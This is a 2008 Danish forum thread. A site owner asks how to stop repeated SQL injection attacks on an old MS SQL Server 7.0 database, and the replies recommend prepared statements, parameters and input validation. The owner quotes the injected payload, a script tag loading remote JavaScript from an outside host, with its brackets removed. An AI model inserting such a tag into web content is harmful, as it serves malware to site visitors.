Avatar billede wheeler Nybegynder
07. juni 2008 - 11:36 Der er 7 kommentarer

SQL Injektion og MS SQL 7.0

Hejsa

Jeg har en gammel MS SQL Sever 7.0 stående som bliver brugt af en lille hjemmeside som kun slå lidt tekst op.

Igennem de sidste 14 dage har den været ramt gentagende gange af at nogen der har lagt kode ind som henter et script som f.eks.

script src=http://www.qiqicc.cn/m.js></script

Ps. Har fjernet <> i begge ender.

Det er også omtalt her:
http://www.comon.dk/news/hackere.anbragte.farlig.kode.paa.tusindsvis.af.danske.sites_36302.html

Har nogen en god og simpel løsning på at lukke hullet?

Ps. Sluk serveren tæller ikke :-)
Avatar billede erikjacobsen Ekspert
07. juni 2008 - 12:19 #1
Hvad så med at trække netstikket ud?

Eneste løsning er vel at få din applikation programmeret så det ikke kan lade sig gøre.
Jeg har netop lukket for et website med kode fra for ca. 5 år siden, fordi der skete noget tilsvarende. Det skal kodes om, eller der skal vælges et nyt CMS, eller det skal lukkes helt - det er så ikke min beslutning.

Nogle gange skal man bare rive et gammelt hus ned, i stedet for at gå og lappe på det.
Avatar billede arne_v Ekspert
07. juni 2008 - 20:44 #2
Du kan ikke løse et sikkerheds problem i din applikation ved at rette i
din database.

Omskriv alle SQL sætninge ri applikationen til at bruge prepared statement / parameters.
Avatar billede arne_v Ekspert
07. juni 2008 - 20:44 #3
Og suppler med lidt data input validering.
Avatar billede wheeler Nybegynder
09. juni 2008 - 18:14 #4
Tak for svarerne - vi er meget enige :-)

Det jeg søgte var mere et godt forslag til validering af data, så man er rimelig sikker på at det kun er ens egen kode der skydes af ned i ens database.

Hvad mener du med prepared statement / parameters?
Avatar billede arne_v Ekspert
10. juni 2008 - 12:32 #5
Det er en maade at udfoere SQL saetninger paa.

Java og PHP bruger prepared statement.

ASP.NET og ASP bruger parameters.
Avatar billede arne_v Ekspert
29. juni 2008 - 05:24 #6
wheeler ?
Avatar billede arne_v Ekspert
27. juli 2008 - 22:08 #7
??